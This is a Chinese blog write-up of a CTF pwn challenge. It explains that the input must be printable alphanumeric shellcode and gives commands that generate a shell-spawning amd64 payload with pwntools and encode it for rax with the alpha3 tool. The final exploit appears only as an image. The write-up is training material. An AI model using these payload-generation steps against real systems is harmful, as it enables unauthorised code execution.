Loading... <!-- wp:paragraph --> <p>这道题大概又是以为call了rax所以无法F5,不过这个的关系倒是不大,代码逻辑还是好理解的</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":593,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201123140812.png" alt="" class="wp-image-593"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>我们要做的就是执行到右边的语句,为了执行右边我们需要执行左边的语句strlen(buf)次,也就是说buf(我们输入的字符串)中必须满足之前的条件。也就是每个字符的ASCII码必须属于(0x60,0x7A]∩(0x2F,0x5A]才会执行code。到这里之后我就不会了,于是我搜了一下<span class="external-link"><a class="no-external-link" href="https://blog.csdn.net/weixin_44145820/article/details/105565953" target="_blank"><i data-feather="external-link"></i>别的师傅的wp</a></span>,原来这个属于string.printable,就是可见字符shellcode。这里使用alpha3就可以生成了。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>依据TaQini这位师傅的<span class="external-link"><a class="no-external-link" href="http://taqini.space/2020/03/31/alpha-shellcode-gen/#alpha3" target="_blank"><i data-feather="external-link"></i>博客</a></span>,我们可以使用他修改过的来生成</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>git clone https://github.com/TaQini/alpha3.git cd alpha3 //需要先生成普通的shellcode vim sc.py</code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>在sc.py中写</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>from pwn import * context.arch='amd64'#这里用64位平台做示例 sc = shellcraft.sh()#这里用shell做示例 print asm(sc)</code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>然后通过</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>python sc.py > shellcode</code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>生成shellcode并通过输出重定向到shellcode将shellcode写到shellcode文件中。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p> 然后</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"</code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>即可生成64位下的rax shellcode了。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>最后的exp</p> <!-- /wp:paragraph --> <!-- wp:image {"id":594,"sizeSlug":"large"} --> <figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201123142544.png" alt="" class="wp-image-594"style=""></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>据这位博主所言,我校也有位师傅写了针对64位的可视shellcode生成<span class="external-link"><a class="no-external-link" href="https://github.com/veritas501/ae64" target="_blank"><i data-feather="external-link"></i>AE64</a></span></p> <!-- /wp:paragraph --> 最后修改:2020 年 12 月 30 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧